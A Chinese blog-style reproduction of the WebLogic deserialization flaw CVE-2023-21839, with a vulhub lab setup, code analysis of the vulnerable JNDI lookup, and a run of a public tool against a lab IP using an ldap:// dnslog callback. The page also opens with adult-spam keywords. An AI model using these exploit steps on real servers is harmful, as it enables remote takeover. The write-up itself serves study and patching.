国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

前言

序列化(Serialization):將對(duì)象的狀態(tài)信息轉(zhuǎn)換為可以存儲(chǔ)或傳輸?shù)男问降倪^程,一般將對(duì)象轉(zhuǎn)換為字節(jié)流。序列化時(shí),對(duì)象的當(dāng)前狀態(tài)被寫入到臨時(shí)或持久性存儲(chǔ)區(qū)(文件、內(nèi)存、數(shù)據(jù)庫等)。

反序列化(Deserialization):從序列化的表示形式中提取數(shù)據(jù),即把有序字節(jié)流恢復(fù)為對(duì)象的過程

反序列化攻擊:攻擊者控制了序列化后的數(shù)據(jù),將有害數(shù)據(jù)傳遞到應(yīng)用程序代碼中,發(fā)動(dòng)針對(duì)應(yīng)用程序的攻擊

Weblogic簡介

WebLogic是美國Oracle公司出品的一個(gè)application server,確切的說是一個(gè)基于JAVAEE架構(gòu)的中間件,WebLogic是用于開發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫應(yīng)用的Java應(yīng)用服務(wù)器。

漏洞詳情

由于Weblogic IIOP/T3協(xié)議存在缺陷,當(dāng)IIOP/T3協(xié)議開啟時(shí),允許未經(jīng)身份驗(yàn)證的攻擊者通過IIOP/T3協(xié)議網(wǎng)絡(luò)訪問攻擊存在安全風(fēng)險(xiǎn)的WebLogic Server,漏洞利用成功WebLogic Server可能被攻擊者接管執(zhí)行任意命令導(dǎo)致服務(wù)器淪陷或者造成嚴(yán)重的敏感數(shù)據(jù)泄露。

漏洞影響版本

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

環(huán)境搭建

在vulhub社區(qū)更新了此漏洞,直接拉取該環(huán)境即可

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

下載地址:https://github.com/vulhub/vulhub
clone下載項(xiàng)目:git clone https://github.com/vulhub/vulhub.git
cd weblogic  //進(jìn)入weblogic文件夾
cd CVE-2023-21839  //進(jìn)入CVE-2023-21839漏洞文件夾
docker-compose up -d //開啟漏洞環(huán)境,拉取鏡像
docker ps  //查看當(dāng)前docker運(yùn)行情況,可以看到該漏洞環(huán)境已經(jīng)開啟

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

訪問http://your-ip:7001/console,可以看到登錄界面

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

漏洞復(fù)現(xiàn)

漏洞解析:
ForeignOpaqueReference是OpaqueReference接口的實(shí)現(xiàn)類。在ForeignOpaqueReference類中聲明了兩個(gè)私有變量:jndiEnvironment和remoteJNDIName,同時(shí)聲明了兩個(gè)構(gòu)造方法,在有參構(gòu)造方法中接收env和remoteJNDIName,并分別賦值給了上面的兩個(gè)私有類變量。

ForeignOpaqueReference類的getReferent()方法是OpaqueReference接口的實(shí)現(xiàn)方法,在getReferent()方法中,retVal = context.lookup(this.remoteJNDIName); 對(duì)本類remoteJNDIName變量中的JNDI地址進(jìn)行遠(yuǎn)程加載,導(dǎo)致了反序列化漏洞

package weblogic.jndi.internal;
//進(jìn)入反序列化
public class ForeignOpaqueReference implements OpaqueReference, Serializable {                  
    private Hashtable jndiEnvironment;
    private String remoteJNDIName;
        ......
    public ForeignOpaqueReference(String remoteJNDIName, Hashtable env) {
        this.remoteJNDIName = remoteJNDIName;
        this.jndiEnvironment = env;
    }
    public Object getReferent(Name name, Context ctx) throws NamingException {
        InitialContext context;
        if (this.jndiEnvironment == null) {
            context = new InitialContext();
        } else {
            Hashtable properties = this.decrypt();
            context = new InitialContext(properties);
        }
        Object retVal;
        try {
            retVal = context.lookup(this.remoteJNDIName);   // 漏洞點(diǎn)
        } finally {
            context.close();
        }
        return retVal;
    }
    ......
}

getReferent()調(diào)用分析

package weblogic.jndi;
public interface OpaqueReference {
    Object getReferent(Name var1, Context var2) throws NamingException;
    String toString();
}

OpaqueReference 接口有兩個(gè)抽象方法:getReferent() 和 toString();

ForeignOpaqueReference 類的 getReferent() 方法調(diào)用在WLNamingManager類中。

在 WLNamingManager 類的 getObjectInstance() 方法中,當(dāng)傳入的 boundObject 對(duì)象實(shí)現(xiàn)了 OpaqueReference 接口時(shí),則會(huì)調(diào)用該對(duì)象的 getReferent() 方法,即 boundObject = ((OpaqueReference)boundObject).getReferent(name, ctx);。

正如上方提到的 ForeignOpaqueReference 類實(shí)現(xiàn)了 OpaqueReference 接口,因此會(huì)調(diào)用該類中的 getReferent() 方法,導(dǎo)致反序列化代碼執(zhí)行漏洞。

package weblogic.jndi.internal;
public final class WLNamingManager {
    public static Object getObjectInstance(Object boundObject, Name name, Context ctx, Hashtable env) throws NamingException {
        if (boundObject instanceof ClassTypeOpaqueReference) {
                        ......
        } else if (boundObject instanceof OpaqueReference) {
            boundObject = ((OpaqueReference)boundObject).getReferent(name, ctx);
        } else if (boundObject instanceof LinkRef) {
      ...
        }
    }
}

CVE-2023-21839是在反序列化過程中沒有進(jìn)行惡意操作,在完成反序列化過程后執(zhí)行了漏洞類ForeignOpaqueReference中g(shù)etReferent()方法中的lookup()才觸發(fā)的漏洞。
其中,Context的lookup方法是用來查找指定名稱的對(duì)象的,它接受一個(gè)字符串參數(shù),返回一個(gè)Object對(duì)象,如果沒有找到指定名稱的對(duì)象,則返回null,我們則利用此點(diǎn)觸發(fā)反序列化漏洞。

這里我直接使用dnslog進(jìn)行測試

下載漏洞檢測工具用于測試是否存在該漏洞
https://github.com/4ra1n/CVE-2023-21839

使用官方提供的工具需要使用go語言編譯
cd cmd
go build -o CVE-2023-21839.exe

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

使用dnslog檢測

CVE-2023-21839.exe -ip 192.168.31.230 -port 7001 -ldap ldap://2qdt3z.dnslog.cn

Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

至此,dnslog有回顯證明漏洞存在

修復(fù)方式

1.下載最新補(bǔ)丁,鏈接:https://support.oracle.com/rs?type=doc&id=2917213.2
2.限制T3協(xié)議訪問文章來源地址http://www.zghlxwxcb.cn/news/detail-470100.html

到了這里,關(guān)于Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

    Tomcat Session(CVE-2020-9484)反序列化漏洞復(fù)現(xiàn)

    ????????北京時(shí)間2020年05月20日,Apache官方發(fā)布了 Apache Tomcat 遠(yuǎn)程代碼執(zhí)行 的風(fēng)險(xiǎn)通告,該漏洞編號(hào)為 CVE-2020-9484。 Apache Tomcat 是一個(gè)開放源代碼、運(yùn)行servlet和JSP Web應(yīng)用軟件的基于Java的Web應(yīng)用軟件容器。當(dāng)Tomcat使用了自帶session同步功能時(shí),使用不安全的配置(沒有使用

    2024年02月01日
    瀏覽(29)
  • Weblogic遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2023-21839

    Weblogic遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2023-21839

    ????????WebLogic Core遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-21839),該漏洞允許未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者通過T3/IIOP協(xié)議進(jìn)行 JNDI lookup 操作,破壞易受攻擊的WebLogic服務(wù)器,成功利用此漏洞可能導(dǎo)致Oracle WebLogic服務(wù)器被接管(RCE)或敏感信息泄露。 ??????? 靶機(jī):kali vullhub docker啟動(dòng)

    2023年04月13日
    瀏覽(24)
  • Kafka反序列化RCE漏洞(CVE-2023-34040)

    Spring Kafka 是 Spring Framework 生態(tài)系統(tǒng)中的一個(gè)模塊,用于簡化在 Spring 應(yīng)用程序中集成 Apache Kafka 的過程,記錄 (record) 指 Kafka 消息中的一條記錄。 受影響版本中默認(rèn)未對(duì)記錄配置? ErrorHandlingDeserializer ,當(dāng)用戶將容器屬性? checkDeserExWhenKeyNull ?或? checkDeserExWhenValueNull ?設(shè)置為

    2024年02月06日
    瀏覽(32)
  • 【漏洞復(fù)現(xiàn)】Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)

    【漏洞復(fù)現(xiàn)】Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說明 內(nèi)容 漏洞編號(hào) CVE-2017-5645 漏洞名稱 Log4j Server 反序列化命令執(zhí)行漏洞 漏洞評(píng)級(jí) 高危 影響范圍 Apache Log4j 2.8.2之前的2.x版本 漏洞描述 修復(fù)方案 1.1、漏洞描述 攻擊者可以通過發(fā)送一個(gè)特別制作的2進(jìn)

    2024年02月05日
    瀏覽(32)
  • 【中?!縎pring Kafka 反序列化漏洞 (CVE-2023-34040)

    【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)

    zhi.oscs1024.com????? 漏洞類型 反序列化 發(fā)現(xiàn)時(shí)間 2023-08-24 漏洞等級(jí) 中危 MPS編號(hào) MPS-fed8-ocuv CVE編號(hào) CVE-2023-34040 漏洞影響廣度 小 OSCS 描述 Spring Kafka?是 Spring Framework 生態(tài)系統(tǒng)中的一個(gè)模塊,用于簡化在 Spring 應(yīng)用程序中集成 Apache Kafka 的過程,記錄(record)指 Kafka 消息中的一

    2024年02月11日
    瀏覽(53)
  • Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)(漏洞復(fù)現(xiàn)詳細(xì)過程)

    Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)(漏洞復(fù)現(xiàn)詳細(xì)過程)

    目錄 一、漏洞介紹 二、漏洞環(huán)境搭建 三、漏洞利用 四、漏洞流量特征: CVE-2017-5645 是 Apache Log4j 服務(wù)器的一個(gè)反序列化命令執(zhí)行漏洞,攻擊者可以利用這個(gè)漏洞通過發(fā)送精心制作的請(qǐng)求,遠(yuǎn)程執(zhí)行命令,從而危及服務(wù)器的安全。 進(jìn)入漏洞目錄文件,啟動(dòng)漏洞環(huán)境:docker-c

    2024年02月16日
    瀏覽(37)
  • 【高?!緼pache Airflow Spark Provider 反序列化漏洞 (CVE-2023-40195)

    【高?!緼pache Airflow Spark Provider 反序列化漏洞 (CVE-2023-40195)

    zhi.oscs1024.com????? 漏洞類型 反序列化 發(fā)現(xiàn)時(shí)間 2023-08-29 漏洞等級(jí) 高危 MPS編號(hào) MPS-qkdx-17bc CVE編號(hào) CVE-2023-40195 漏洞影響廣度 廣 OSCS 描述 Apache Airflow Spark Provider是Apache Airflow項(xiàng)目的一個(gè)插件,用于在Airflow中管理和調(diào)度Apache Spark作業(yè)。 受影響版本中,由于沒有對(duì)conn_prefix參

    2024年02月10日
    瀏覽(29)
  • Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    背景:公司項(xiàng)目掃描到 Spring-Kafka上使用通配符模式匹配進(jìn)行的安全繞過漏洞 CVE-2023-20873 中等風(fēng)險(xiǎn) | 2023年8月23日 | CVE-2023-34040 在Spring for Apache Kafka 3.0.9及更早版本以及2.9.10及更早版本中,存在可能的反序列化攻擊向量,但只有在應(yīng)用了不常見的配置時(shí)才會(huì)出現(xiàn)。攻擊者必須在

    2024年02月07日
    瀏覽(45)
  • weblogic反序列化之T3協(xié)議
CVE-2015-4582

    weblogic反序列化之T3協(xié)議 CVE-2015-4582

    weblogic 的反序列化漏洞分為兩種 ,一種是基于T3 協(xié)議的反序列化漏洞,一個(gè)是基于XML的反序列化漏洞,這篇來分析一下基于T3 協(xié)議的反序列化漏洞,本文參考了很多師傅的文章,我會(huì)貼在最后面。 [JAVA安全]weblogic反序列化介紹及環(huán)境搭建_snowlyzz的博客-CSDN博客 https://jitpack.i

    2024年02月04日
    瀏覽(25)
  • Weblogic反序列化漏洞

    Weblogic反序列化漏洞

    漏洞環(huán)境基于vulhub搭建–進(jìn)入weak_password的docker環(huán)境 sudo docker-compose up -d拉取靶場 404特征Weblogic常用端口:7001 任意讀取文件、后臺(tái)getshell,訪問/console/login/LoginForm.jsp后綴來到后臺(tái)管理處 獲取用戶名密碼 http://192.168.25.128:7001/console/login/LoginForm.jsp 使用任意讀取文件方式獲取用戶

    2024年02月09日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包